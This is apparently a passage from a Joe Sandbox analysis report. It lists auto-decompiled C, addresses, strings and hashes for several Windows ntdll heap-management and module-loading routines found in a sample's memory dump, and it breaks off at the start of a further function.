String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 5d64a30b11d9a1b8f42bd01bd88997884edc869d35a7a4d983986c2113e2e845
Instruction ID: 79b2fa96913f9e96b69d2174c80986d494e95a05fa54c4485c09017f16d4960a
Opcode Fuzzy Hash: 5d64a30b11d9a1b8f42bd01bd88997884edc869d35a7a4d983986c2113e2e845
Instruction Fuzzy Hash: D0616D72D01229AFDF21DF55DC98BA9B7B8FB04710F4101E9A908AB250DB74DE84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 36ADF75B Relevance: 3.9, Strings: 3, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E36ADF75B(void* __ecx, signed short* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				signed char _t63;
				signed int _t67;
				void* _t71;
				intOrPtr _t72;
				void* _t79;
				signed char* _t82;
				intOrPtr _t83;
				signed char* _t88;
				intOrPtr _t89;
				void* _t90;
				signed char* _t93;
				void* _t126;
				signed int* _t127;

				_t127 = __edx;
				_t126 = __ecx;
				_t58 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t31 =  &(_t127[4]); // 0xddeeddfe
					E36B38140(_t31, _t58 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t63 =  *(_t126 + 0xcc) ^  *0x36bd6d48;
				if(_t63 == 0) {
					_t63 = E36ADF858(_t127,  &_v12,  &_v8);
					if(_t63 != 0) {
						_t71 = E36ADFABA( &_v12,  &_v8, 0x4000);
						_t109 = _t71;
						if(_t71 < 0) {
							_t72 =  *[fs:0x30];
							__eflags =  *(_t72 + 0xc);
							if( *(_t72 + 0xc) == 0) {
								_push("HEAP: ");
								E36ADB910();
							} else {
								E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t126);
							_t63 = E36ADB910("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t109);
						} else {
							_t79 = E36AF3C40();
							_t110 = 0x7ffe0380;
							if(_t79 != 0) {
								_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t82 = 0x7ffe0380;
							}
							if( *_t82 != 0) {
								_t83 =  *[fs:0x30];
								__eflags =  *(_t83 + 0x240) & 0x00000001;
								if(( *(_t83 + 0x240) & 0x00000001) != 0) {
									E36B9F13E(_t110, _t126, _v12, _v8, 7);
								}
							}
							 *((intOrPtr*)(_t126 + 0x220)) =  *((intOrPtr*)(_t126 + 0x220)) + 1;
							 *((intOrPtr*)(_t126 + 0x240)) =  *((intOrPtr*)(_t126 + 0x240)) + 1;
							 *((intOrPtr*)(_t126 + 0x244)) =  *((intOrPtr*)(_t126 + 0x244)) + _v8;
							 *((intOrPtr*)(_t126 + 0x230)) =  *((intOrPtr*)(_t126 + 0x230)) + 1;
							if(E36AF3C40() != 0) {
								_t88 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t88 = _t110;
							}
							if( *_t88 != 0) {
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0x240) & 0x00000001;
								if(( *(_t89 + 0x240) & 0x00000001) != 0) {
									__eflags = E36AF3C40();
									if(__eflags != 0) {
										_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E36B9F058(_t110, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t110 & 0x000000ff);
								}
							}
							_t90 = E36AF3C40();
							_t111 = 0x7ffe038a;
							if(_t90 != 0) {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t93 = 0x7ffe038a;
							}
							if( *_t93 != 0) {
								__eflags = E36AF3C40();
								if(__eflags != 0) {
									_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								}
								E36B9F058(_t111, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t111 & 0x000000ff);
							}
							_t63 = _t127[0] & 0x00000013 | 0x00000008;
							_t127[0] = _t63;
						}
					}
				}
				if( *((intOrPtr*)(_t126 + 0x4c)) != 0) {
					_t127[0] = _t127[0] ^ _t127[0] ^  *_t127;
					_t67 =  *(_t126 + 0x50);
					 *_t127 =  *_t127 ^ _t67;
					return _t67;
				}
				return _t63;
			}

0x36adf765
0x36adf768
0x36adf76a
0x36adf76d
0x36adf771
0x36adf779
0x36adf77c
0x36b3e322
0x36b3e326
0x36b3e32b
0x36b3e32b
0x36adf788
0x36adf78e
0x36adf79e
0x36adf7a5
0x36adf7b7
0x36adf7bc
0x36adf7c0
0x36b3e419
0x36b3e41f
0x36b3e423
0x36b3e442
0x36b3e447
0x36b3e425
0x36b3e43a
0x36b3e43f
0x36b3e44d
0x36b3e450
0x36b3e453
0x36b3e45a
0x36adf7c6
0x36adf7c6
0x36adf7cb
0x36adf7d2
0x36b3e33d
0x36adf7d8
0x36adf7d8
0x36adf7d8
0x36adf7dd
0x36b3e347
0x36b3e34d
0x36b3e354
0x36b3e364
0x36b3e364
0x36b3e354
0x36adf7e3
0x36adf7ec
0x36adf7f2
0x36adf7f8
0x36adf805
0x36b3e377
0x36adf80b
0x36adf80b
0x36adf80b
0x36adf810
0x36b3e381
0x36b3e387
0x36b3e38e
0x36b3e399
0x36b3e39b
0x36b3e3a6
0x36b3e3a6
0x36b3e3a6
0x36b3e3c3
0x36b3e3c3
0x36b3e38e
0x36adf816
0x36adf81b
0x36adf822
0x36b3e3d6
0x36adf828
0x36adf828
0x36adf828
0x36adf82d
0x36b3e3e5
0x36b3e3e7
0x36b3e3f2
0x36b3e3f2
0x36b3e3f2
0x36b3e40f
0x36b3e40f
0x36adf838
0x36adf83a
0x36adf83a
0x36adf7c0
0x36adf7a5
0x36adf841
0x36adf84b
0x36adf84e
0x36adf851
0x00000000
0x36adf851
0x36adf857

Strings

HEAP[%wZ]: , xrefs: 36B3E435
HEAP: , xrefs: 36B3E442
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 36B3E455

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: bb49ba40e6e0995e4888b51c5fd3522f9b34b02d7efacd57e0dc9e4b51b1a305
Instruction ID: 2f3825e36d401148785319f9a59d8883b7d5e4bc33f28883a7cfdcddf7e954d7
Opcode Fuzzy Hash: bb49ba40e6e0995e4888b51c5fd3522f9b34b02d7efacd57e0dc9e4b51b1a305
Instruction Fuzzy Hash: 02512735A01794EFE712CB65CDA4F9ABBF8FF04344F1440A6E9408B262D734E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 36B01514 Relevance: 3.9, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E36B01514(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t66;
				signed int _t69;
				void* _t73;
				signed int _t75;
				char* _t78;
				intOrPtr _t79;
				signed int _t80;
				char* _t83;
				intOrPtr _t84;
				signed int _t85;
				signed int _t92;
				signed char* _t93;
				signed char _t98;
				intOrPtr _t103;
				signed int _t104;
				void* _t107;
				signed int _t118;
				intOrPtr _t119;
				intOrPtr _t120;

				_t103 = __edx;
				_v8 = __ecx;
				_t118 = 0;
				_t119 =  *((intOrPtr*)(__ecx + 0x20));
				_v16 = __edx;
				_t107 = E36AEDE20(__ecx, __eflags,  *((intOrPtr*)(_t119 + 0x18)), "true", 0xe,  &_v20);
				if(_t107 != 0) {
					_t66 = _v8;
					__eflags =  *(_t66 + 0x10) & 0x00800000;
					if(( *(_t66 + 0x10) & 0x00800000) != 0) {
						L19:
						_t118 = 0xc000007b;
						L6:
						return _t118;
					}
					_t69 =  *(_t119 + 0x34) | 0x00400000;
					 *(_t119 + 0x34) = _t69;
					__eflags =  *(_t107 + 0x10) & 0x00000001;
					if(__eflags == 0) {
						goto L1;
					}
					 *(_t119 + 0x34) = _t69 | 0x01000000;
					_t118 = E36AD6DD0( *((intOrPtr*)(_t119 + 0x18)), __eflags);
					__eflags = _t118;
					if(_t118 < 0) {
						goto L6;
					} else {
						goto L1;
					}
					goto L19;
				}
				L1:
				if(( *(_t103 + 0x16) & 0x00002000) == 0) {
					 *(_t119 + 0x34) =  *(_t119 + 0x34) & 0xfffffffb;
					goto L6;
				}
				if(( *( *((intOrPtr*)(_t119 + 0x5c)) + 0x10) & 0x00000080) != 0) {
					__eflags =  *(_t103 + 0x5e) & 0x00000080;
					if(( *(_t103 + 0x5e) & 0x00000080) != 0) {
						goto L3;
					}
					_t98 =  *0x36bd37c0; // 0x0
					__eflags = _t98 & 0x00000003;
					if((_t98 & 0x00000003) != 0) {
						_t45 = _t119 + 0x24; // 0x123
						E36B5E692("minkernel\\ntdll\\ldrmap.c", 0x3a2, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t45);
						_t98 =  *0x36bd37c0; // 0x0
					}
					__eflags = _t98 & 0x00000010;
					if((_t98 & 0x00000010) != 0) {
						asm("int3");
					}
					_t118 = 0xc0000428;
					goto L6;
				}
				L3:
				if(( *(_t119 + 0x34) & 0x01000000) != 0) {
					goto L6;
				}
				_t73 = _a4 - 0x40000003;
				if(_t73 == 0 || _t73 == 0x33) {
					_v12 =  *((intOrPtr*)(_t119 + 0x18));
					_t75 = E36AF3C40();
					__eflags = _t75;
					if(_t75 != 0) {
						_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t78 = 0x7ffe0384;
					}
					__eflags =  *_t78;
					_t104 = 0x7ffe0385;
					if( *_t78 != 0) {
						_t79 =  *[fs:0x30];
						__eflags =  *(_t79 + 0x240) & 0x00000004;
						if(( *(_t79 + 0x240) & 0x00000004) != 0) {
							_t92 = E36AF3C40();
							__eflags = _t92;
							if(_t92 == 0) {
								_t93 = 0x7ffe0385;
							} else {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t93 & 0x00000020;
							if(( *_t93 & 0x00000020) != 0) {
								E36B60227(0x1490, _v12, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					__eflags = _a4 - 0x40000003;
					if(_a4 != 0x40000003) {
						L12:
						_t120 =  *((intOrPtr*)(_t119 + 0x18));
						_t80 = E36AF3C40();
						__eflags = _t80;
						if(_t80 != 0) {
							_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t83 = 0x7ffe0384;
						}
						__eflags =  *_t83;
						if( *_t83 != 0) {
							_t84 =  *[fs:0x30];
							__eflags =  *(_t84 + 0x240) & 0x00000004;
							if(( *(_t84 + 0x240) & 0x00000004) != 0) {
								_t85 = E36AF3C40();
								__eflags = _t85;
								if(_t85 != 0) {
									_t104 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									__eflags = _t104;
								}
								__eflags =  *_t104 & 0x00000020;
								if(( *_t104 & 0x00000020) != 0) {
									E36B60227(0x1491, _t120, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						goto L6;
					} else {
						_t21 = _t119 + 0x24; // 0x123
						_v12 = _t21;
						_t118 = E36B1D3EF( *((intOrPtr*)(_t119 + 0x18)),  *((intOrPtr*)(_v8 + 0x5c)), _v16, _t21);
						__eflags = _t118;
						if(_t118 < 0) {
							E36B1C98F(_t118, 0x1490, 0, _v12);
							goto L6;
						}
						goto L12;
					}
				} else {
					goto L6;
				}
			}

0x36b0151f
0x36b01523
0x36b01526
0x36b01528
0x36b01536
0x36b0153e
0x36b01542
0x36b015f5
0x36b015f8
0x36b015ff
0x36b4a34d
0x36b4a34d
0x36b0157c
0x36b01582
0x36b01582
0x36b01608
0x36b0160d
0x36b01610
0x36b01614
0x00000000
0x00000000
0x36b4a35f
0x36b4a367
0x36b4a369
0x36b4a36b
0x00000000
0x36b4a371
0x00000000
0x36b4a371
0x00000000
0x36b4a36b
0x36b01548
0x36b01551
0x36b4a376
0x00000000
0x36b4a376
0x36b0155e
0x36b4a37f
0x36b4a383
0x00000000
0x00000000
0x36b4a389
0x36b4a38e
0x36b4a390
0x36b4a392
0x36b4a3ac
0x36b4a3b1
0x36b4a3b6
0x36b4a3b9
0x36b4a3bb
0x36b4a3bd
0x36b4a3bd
0x36b4a3be
0x00000000
0x36b4a3be
0x36b01564
0x36b0156b
0x00000000
0x00000000
0x36b01570
0x36b01575
0x36b01588
0x36b0158b
0x36b01590
0x36b01592
0x36b4a3d1
0x36b01598
0x36b01598
0x36b01598
0x36b0159d
0x36b015a0
0x36b015a5
0x36b4a3db
0x36b4a3e1
0x36b4a3e8
0x36b4a3ee
0x36b4a3f3
0x36b4a3f5
0x36b4a407
0x36b4a3f7
0x36b4a400
0x36b4a400
0x36b4a409
0x36b4a40c
0x36b4a422
0x36b4a422
0x36b4a40c
0x36b4a3e8
0x36b015ab
0x36b015b2
0x36b015d6
0x36b015d6
0x36b015d9
0x36b015de
0x36b015e0
0x36b4a44b
0x36b015e6
0x36b015e6
0x36b015e6
0x36b015eb
0x36b015ee
0x36b4a455
0x36b4a45b
0x36b4a462
0x36b4a468
0x36b4a46d
0x36b4a46f
0x36b4a47a
0x36b4a47a
0x36b4a47a
0x36b4a480
0x36b4a483
0x36b4a498
0x36b4a498
0x36b4a483
0x36b4a462
0x00000000
0x36b015b4
0x36b015b7
0x36b015be
0x36b015cc
0x36b015ce
0x36b015d0
0x36b4a438
0x00000000
0x36b4a438
0x00000000
0x36b015d0
0x00000000
0x00000000
0x00000000

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 36B4A396
LdrpCompleteMapModule, xrefs: 36B4A39D
minkernel\ntdll\ldrmap.c, xrefs: 36B4A3A7

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 070ff2ca1945962cf5db3a4ff7293c4004413132f24f67194351c6d7e4a57c0c
Instruction ID: 9367e0d853406e6e7a40889ed3f95a5e601ff4055e8f8bde85e2f0ef059a3ff6
Opcode Fuzzy Hash: 070ff2ca1945962cf5db3a4ff7293c4004413132f24f67194351c6d7e4a57c0c
Instruction Fuzzy Hash: 22512278A00761DBF726DBA9C945B0ABFE4EB00758F105194EA529F2D2DB74E800CF91

Uniqueness

Uniqueness Score: -1.00%

Function 36B8D62C Relevance: 3.9, Strings: 3, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E36B8D62C(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed int _t52;
				intOrPtr _t53;
				signed int _t63;
				signed short _t64;
				intOrPtr _t67;
				signed short _t71;
				signed int _t74;
				signed short _t75;
				signed short _t77;
				void* _t81;
				signed int _t82;
				signed int _t83;
				signed char _t92;
				unsigned int _t97;
				unsigned int _t102;
				signed int _t106;
				void* _t108;
				void* _t109;
				unsigned int _t112;

				_t82 = __ecx;
				_push(__ecx);
				_t112 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t71 =  *__edx;
							if(( *(__ecx + 0x4c) & _t71) != 0) {
								_t71 = _t71 ^  *(__ecx + 0x50);
							}
							_t44 = _t71 & 0x0000ffff;
						}
					} else {
						_t102 = __edx >> 0x00000003 ^  *__edx ^  *0x36bd6964 ^ __ecx;
						if(_t102 == 0) {
							_t74 =  *((intOrPtr*)(__edx - (_t102 >> 0xd)));
						} else {
							_t74 = 0;
						}
						_t44 =  *((intOrPtr*)(_t74 + 0x14));
					}
					_t92 =  *((intOrPtr*)(_t112 + 7));
					_t106 = _t44 & 0xffff;
					if(_t92 != 5) {
						if((_t92 & 0x00000040) == 0) {
							if((_t92 & 0x0000003f) == 0x3f) {
								if(_t92 >= 0) {
									if( *(_t82 + 0x4c) == 0) {
										_t48 =  *_t112 & 0x0000ffff;
									} else {
										_t64 =  *_t112;
										if(( *(_t82 + 0x4c) & _t64) != 0) {
											_t64 = _t64 ^  *(_t82 + 0x50);
										}
										_t48 = _t64 & 0x0000ffff;
									}
								} else {
									_t97 = _t112 >> 0x00000003 ^  *_t112 ^  *0x36bd6964 ^ _t82;
									if(_t97 == 0) {
										_t67 =  *((intOrPtr*)(_t112 - (_t97 >> 0xd)));
									} else {
										_t67 = 0;
									}
									_t48 =  *((intOrPtr*)(_t67 + 0x14));
								}
								_t83 =  *(_t112 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t83 = _t92 & 0x3f;
							}
						} else {
							_t83 =  *(_t112 + 4 + (_t92 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t83 =  *(_t82 + 0x54) & 0x0000ffff ^  *(_t112 + 4) & 0x0000ffff;
					}
					_t108 = (_t106 << 3) - _t83;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t75 =  *__edx & 0x0000ffff;
					} else {
						_t77 =  *__edx;
						if(( *(__ecx + 0x4c) & _t77) != 0) {
							_t77 = _t77 ^  *(__ecx + 0x50);
						}
						_t75 = _t77 & 0x0000ffff;
					}
					_t108 =  *((intOrPtr*)(_t112 - 8)) - (_t75 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t112 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t63 = _t51 & 0x3f;
					goto L38;
				} else {
					_t63 =  *(_t112 + 6) & 0x000000ff;
					L38:
					_t52 = _t63 << 3;
					L42:
					_t109 = _t108 + _t52;
					_t35 = _t112 + 8; // -16
					_t81 = _t35 + _t109;
					_t53 = E36B38050(_t81, 0x36ab72b8, "true");
					_v8 = _t53;
					if(_t53 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E36ADB910();
					} else {
						E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t109);
					_push(_v8 + _t81);
					E36ADB910("Heap block at %p modified at %p past requested size of %Ix\n", _t112);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x36bd47a1 = 1;
						asm("int3");
						 *0x36bd47a1 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x36b8d62c
0x36b8d631
0x36b8d634
0x36b8d637
0x36b8d63c
0x36b8d7de
0x36b8d7de
0x36b8d7e0
0x36b8d7e4
0x36b8d7e4
0x36b8d644
0x36b8d66d
0x36b8d698
0x36b8d6a9
0x36b8d69a
0x36b8d69a
0x36b8d69f
0x36b8d6a1
0x36b8d6a1
0x36b8d6a4
0x36b8d6a4
0x36b8d66f
0x36b8d67a
0x36b8d67f
0x36b8d68c
0x36b8d681
0x36b8d681
0x36b8d681
0x36b8d68e
0x36b8d68e
0x36b8d6ac
0x36b8d6b2
0x36b8d6b8
0x36b8d6c9
0x36b8d6de
0x36b8d6ea
0x36b8d717
0x36b8d728
0x36b8d719
0x36b8d719
0x36b8d71e
0x36b8d720
0x36b8d720
0x36b8d723
0x36b8d723
0x36b8d6ec
0x36b8d6f9
0x36b8d6fe
0x36b8d70b
0x36b8d700
0x36b8d700
0x36b8d700
0x36b8d70d
0x36b8d70d
0x36b8d731
0x36b8d6e0
0x36b8d6e3
0x36b8d6e3
0x36b8d6cb
0x36b8d6d1
0x36b8d6d1
0x36b8d6ba
0x36b8d6c2
0x36b8d6c2
0x36b8d738
0x36b8d646
0x36b8d64a
0x36b8d65b
0x36b8d64c
0x36b8d64c
0x36b8d651
0x36b8d653
0x36b8d653
0x36b8d656
0x36b8d656
0x36b8d664
0x36b8d664
0x36b8d73a
0x36b8d73f
0x36b8d74c
0x36b8d756
0x00000000
0x36b8d756
0x36b8d751
0x00000000
0x36b8d741
0x36b8d741
0x36b8d745
0x36b8d745
0x36b8d758
0x36b8d75a
0x36b8d75c
0x36b8d764
0x36b8d767
0x36b8d76c
0x36b8d772
0x00000000
0x00000000
0x36b8d77f
0x36b8d79f
0x36b8d7a4
0x36b8d781
0x36b8d797
0x36b8d79c
0x36b8d7ad
0x36b8d7b0
0x36b8d7b7
0x36b8d7c9
0x36b8d7cb
0x36b8d7d2
0x36b8d7d3
0x36b8d7d3
0x36b8d7da
0x00000000
0x36b8d7da

Strings

HEAP[%wZ]: , xrefs: 36B8D792
HEAP: , xrefs: 36B8D79F
Heap block at %p modified at %p past requested size of %Ix, xrefs: 36B8D7B2

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 5ee6cabe78b086f30417b1abb31fefb5489f494d3e1fe352533cf6ba0cd3105b
Instruction ID: f14ce2b65641f8ca4db1c7338f75cd0e18ddda477f5f9f49c189048af3a85245
Opcode Fuzzy Hash: 5ee6cabe78b086f30417b1abb31fefb5489f494d3e1fe352533cf6ba0cd3105b
Instruction Fuzzy Hash: B851E27E5003E48EF350DF2AC84077277E2EB452C8F91488FE4C58B685E62AD846DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 36AD753F Relevance: 3.9, Strings: 3, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E36AD753F(signed int __ecx, signed int __edx, intOrPtr _a4) {
				unsigned int _v12;
				signed char _t46;
				signed char _t50;
				intOrPtr* _t52;
				unsigned int _t53;
				signed char _t54;
				signed int _t57;
				signed int _t60;
				intOrPtr _t64;
				intOrPtr* _t66;
				signed int _t67;
				unsigned int _t78;
				signed int _t80;

				_t60 = __edx;
				_t80 = __ecx;
				if(__edx == 0 || (__edx & 0x00000007) != 0) {
					L37:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E36ADB910();
					} else {
						E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t60 + 8);
					_push(_t80);
					E36ADB910("Invalid address specified to %s( %p, %p )\n", _a4);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x36bd47a1 = 1;
						asm("int3");
						 *0x36bd47a1 = 0;
					}
					return 0;
				} else {
					_t46 =  *((intOrPtr*)(__edx + 7));
					if((_t46 & 0x0000003f) == 0) {
						goto L37;
					}
					if(_t46 < 0) {
						if( *((char*)(__ecx + 0xea)) != 2) {
							_t64 = 0;
						} else {
							_t64 =  *((intOrPtr*)(__ecx + 0xe4));
						}
						if(_t64 != 0) {
							if(_t46 != 4) {
								L23:
								return 1;
							}
						}
						goto L37;
					}
					if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
						L6:
						if( *((char*)(_t60 + 7)) == 4) {
							if((_t60 & 0x00000fff) != 0x18) {
								goto L37;
							}
							L13:
							if( *(_t80 + 0x4c) == 0) {
								_t50 =  *((intOrPtr*)(_t60 + 2));
							} else {
								_t53 =  *_t60;
								if(( *(_t80 + 0x4c) & _t53) != 0) {
									_t53 = _t53 ^  *(_t80 + 0x50);
								}
								_t50 = _t53 >> 0x10;
							}
							if((_t50 & 0x00000004) != 0) {
								if(E36B8D62C(_t80, _t60) != 0) {
									goto L18;
								}
							} else {
								L18:
								if( *((char*)(_t60 + 7)) == 4) {
									goto L23;
								}
								_t66 = _t80 + 0xa4;
								_t52 =  *_t66;
								while(_t52 != _t66) {
									if(_t60 <  *((intOrPtr*)(_t52 + 0x14)) || _t60 >=  *((intOrPtr*)(_t52 + 0x18))) {
										_t52 =  *_t52;
										continue;
									} else {
										goto L23;
									}
								}
							}
							goto L37;
						}
						_t54 =  *((intOrPtr*)(_t60 + 6));
						if(_t54 == 0) {
							_t67 = _t80;
						} else {
							_t67 = (_t60 & 0xffff0000) - ((_t54 & 0x000000ff) << 0x10) + 0x10000;
						}
						if(_t67 == 0 ||  *((intOrPtr*)(_t67 + 0x18)) != _t80 || _t60 <  *((intOrPtr*)(_t67 + 0x24)) || _t60 >=  *((intOrPtr*)(_t67 + 0x28))) {
							goto L37;
						} else {
							goto L13;
						}
					}
					_t57 =  *__edx;
					_t78 =  *(__ecx + 0x50) ^ _t57;
					_v12 = _t57;
					_v12 = _t78;
					if(_t78 >> 0x18 != (_t78 >> 0x00000010 ^ _t78 >> 0x00000008 ^ _t78)) {
						goto L37;
					}
					goto L6;
				}
			}

0x36ad7548
0x36ad754b
0x36ad754f
0x36b3ad1e
0x36b3ad28
0x36b3ad47
0x36b3ad4c
0x36b3ad2a
0x36b3ad3f
0x36b3ad44
0x36b3ad55
0x36b3ad56
0x36b3ad5f
0x36b3ad71
0x36b3ad73
0x36b3ad7a
0x36b3ad7b
0x36b3ad7b
0x00000000
0x36ad755e
0x36ad755e
0x36ad7563
0x00000000
0x00000000
0x36ad756b
0x36ad7639
0x36ad7659
0x36ad763b
0x36ad763b
0x36ad763b
0x36ad7643
0x36ad764b
0x36ad7626
0x00000000
0x36ad7626
0x36ad764d
0x00000000
0x36ad7643
0x36ad7575
0x36ad759d
0x36ad75a1
0x36b3ad06
0x00000000
0x00000000
0x36ad75eb
0x36ad75ef
0x36ad765d
0x36ad75f1
0x36ad75f1
0x36ad75f6
0x36ad75f8
0x36ad75f8
0x36ad75fb
0x36ad75fb
0x36ad7600
0x36b3ad18
0x00000000
0x00000000
0x36ad7606
0x36ad7606
0x36ad760a
0x00000000
0x00000000
0x36ad760c
0x36ad7612
0x36ad7614
0x36ad761f
0x36ad762e
0x00000000
0x00000000
0x00000000
0x00000000
0x36ad761f
0x36ad7614
0x00000000
0x36ad7600
0x36ad75a7
0x36ad75ac
0x36ad7652
0x36ad75b2
0x36ad75c2
0x36ad75c2
0x36ad75ca
0x00000000
0x00000000
0x00000000
0x00000000
0x36ad75ca
0x36ad7577
0x36ad757c
0x36ad757e
0x36ad7583
0x36ad7597
0x00000000
0x00000000
0x00000000
0x36ad7597

Strings

HEAP[%wZ]: , xrefs: 36B3AD3A
HEAP: , xrefs: 36B3AD47
Invalid address specified to %s( %p, %p ), xrefs: 36B3AD5A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 6a1202175c29301ea584fd6c546b79dd9153822f27172e09e40318824c4b8b9b
Instruction ID: 23c2e1ee0bd059875555d1f465873493e022848a73341e849513361aa36467bc
Opcode Fuzzy Hash: 6a1202175c29301ea584fd6c546b79dd9153822f27172e09e40318824c4b8b9b
Instruction Fuzzy Hash: F9412578B413A0CFFB18CE19C4A8769BBE0EF0124AF7440A9CC458F656DAB4D845CF61

Uniqueness

Uniqueness Score: -1.00%

Function 36B115EF Relevance: 3.9, Strings: 3, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E36B115EF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t59;
